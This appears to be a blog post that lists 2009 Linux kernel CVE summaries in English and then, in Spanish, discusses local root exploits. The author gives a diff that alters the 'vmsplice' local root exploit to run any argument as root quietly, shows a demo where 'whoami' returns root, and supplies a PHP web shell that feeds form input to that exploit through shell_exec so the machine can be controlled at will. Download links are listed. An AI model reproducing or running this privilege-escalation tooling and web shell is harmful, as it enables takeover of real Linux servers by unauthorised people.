CVE-2009-0028

    Chris Evans discovered a situation in which a child process can
    send an arbitrary signal to its parent.

CVE-2009-0834

    Roland McGrath discovered an issue on amd64 kernels that allows
    local users to circumvent system call audit configurations which
    filter based on the syscall numbers or argument details.

CVE-2009-0835

    Roland McGrath discovered an issue on amd64 kernels with
    CONFIG_SECCOMP enabled. By making a specially crafted syscall,
    local users can bypass access restrictions.

CVE-2009-0859

    Jiri Olsa discovered that a local user can cause a denial of
    service (system hang) using a SHM_INFO shmctl call on kernels
    compiled with CONFIG_SHMEM disabled. This issue does not affect
    prebuilt Debian kernels.

CVE-2009-1046

    Mikulas Patocka reported an issue in the console subsystem that
    allows a local user to cause memory corruption by selecting a
    small number of 3-byte UTF-8 characters.

CVE-2009-1072

    Igor Zhbanov reported that nfsd was not properly dropping
    CAP_MKNOD, allowing users to create device nodes on file systems
    exported with root_squash.

CVE-2009-1184

    Dan Carpenter reported a coding issue in the selinux subsystem
    that allows local users to bypass certain networking checks when
    running with compat_net=1.

CVE-2009-1192

    Shaohua Li reported an issue in the AGP subsystem they may allow
    local users to read sensitive kernel memory due to a leak of
    uninitialized memory.

CVE-2009-1242

    Benjamin Gilbert reported a local denial of service vulnerability
    in the KVM VMX implementation that allows local users to trigger
    an oops.

CVE-2009-1265

    Thomas Pollet reported an overflow in the af_rose implementation
    that allows remote attackers to retrieve uninitialized kernel
    memory that may contain sensitive data.

CVE-2009-1337

    Oleg Nesterov discovered an issue in the exit_notify function that
    allows local users to send an arbitrary signal to a process by
    running a program that modifies the exit_signal field and then
    uses an exec system call to launch a setuid application.

CVE-2009-1338

    Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to
    reach processes outside of the current process namespace.

CVE-2009-1439

    Pavan Naregundi reported an issue in the CIFS filesystem code that
    allows remote users to overwrite memory via a long
    nativeFileSystem field in a Tree Connect response during mount.

Se publicaron dos exploits para explotar vulnerabildades de escalacion de provilegios local. Estos exploits se aprovechan de la funcion ptrace_attach() para ejecutar un codigo arbitrario que nos permita ejecutar una shell del tipo /bin/sh como root.
El primer exploit es el shoryuken, lo probé en distintas versiones del kernel de debian y archlinux, pudiendo ser explotada solo la version 2.6.26-1-686 de Debian 5.0, de forma aleatoria, es decir, hay veces que ejecuto el exploit y funciona y otras veces no. El segundo script fue probado por su autor en la version del kernel 2.6.29rc1 de Gentoo.
Estos exploits funcionan bajo situaciones especificas y no todos los sistemas son vulnerables.

Compartir/Guardar

root-exploit.diff

1. 51a52
2. > char  *_cmd;
3. 55d55
4. < printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
5. 182,183d181
6. <
7. <       printf("[+] root\n");
8. 185c183,184
9. <       execl("/bin/bash", "bash", "-i", NULL);
10. —
11. >       system(_cmd);
12. >       //execl("/bin/bash", "bash", "-i", NULL);
13. 195a195
14. >       _cmd = argv[1];
15. 202,205d201
16. < printf("———————————–\n");
17. <       printf(" Linux vmsplice Local Root Exploit\n");
18. <       printf(" By qaaz\n");
19. <       printf("———————————–\n");
20. 221,223d216
21. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
22. <       printf("[+] page: 0x%lx\n", pages[0]);
23. <       printf("[+] page: 0x%lx\n", pages[1]);
24. 241,243d233
25. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
26. <       printf("[+] page: 0x%lx\n", pages[2]);
27. <       printf("[+] page: 0x%lx\n", pages[3]);
28. 258,259d247
29. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
30. <       printf("[+] page: 0x%lx\n", pages[4]);
31. 269d256
32. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size)

La modificacion que hago es eliminar todos los printf para que el resultado sea mas limpio ademas, tambien modifico el codigo para que ejecute el comando que nosotros le digamos y luego vuelva a su estado normal.

Demostracion

username@machine:~$ ./root-exploit whoami
root
username@machine:~$

De esta manera podremos programar un sencillo script en php para manipular la maquina vulnerable como se nos de la gana.

1. < ?PHP
2. print "
3. <form action="?" method="post">
4. <input name="cmd" type="text" />
5. <input type="submit" value="eXec!" />
6.  
7. ";
8. if(isset($_POST[‘cmd’]))
9. {
10.    print "<textarea cols="30" rows="120">";
11.    print shell_exec("./root-exploit ".$_POST[‘cmd’]);
12.    print "</textarea>";
13. }
14. ?>

Descargas
Variacion del exploit
Exploit original 1
Exploit original 2

Compartir/Guardar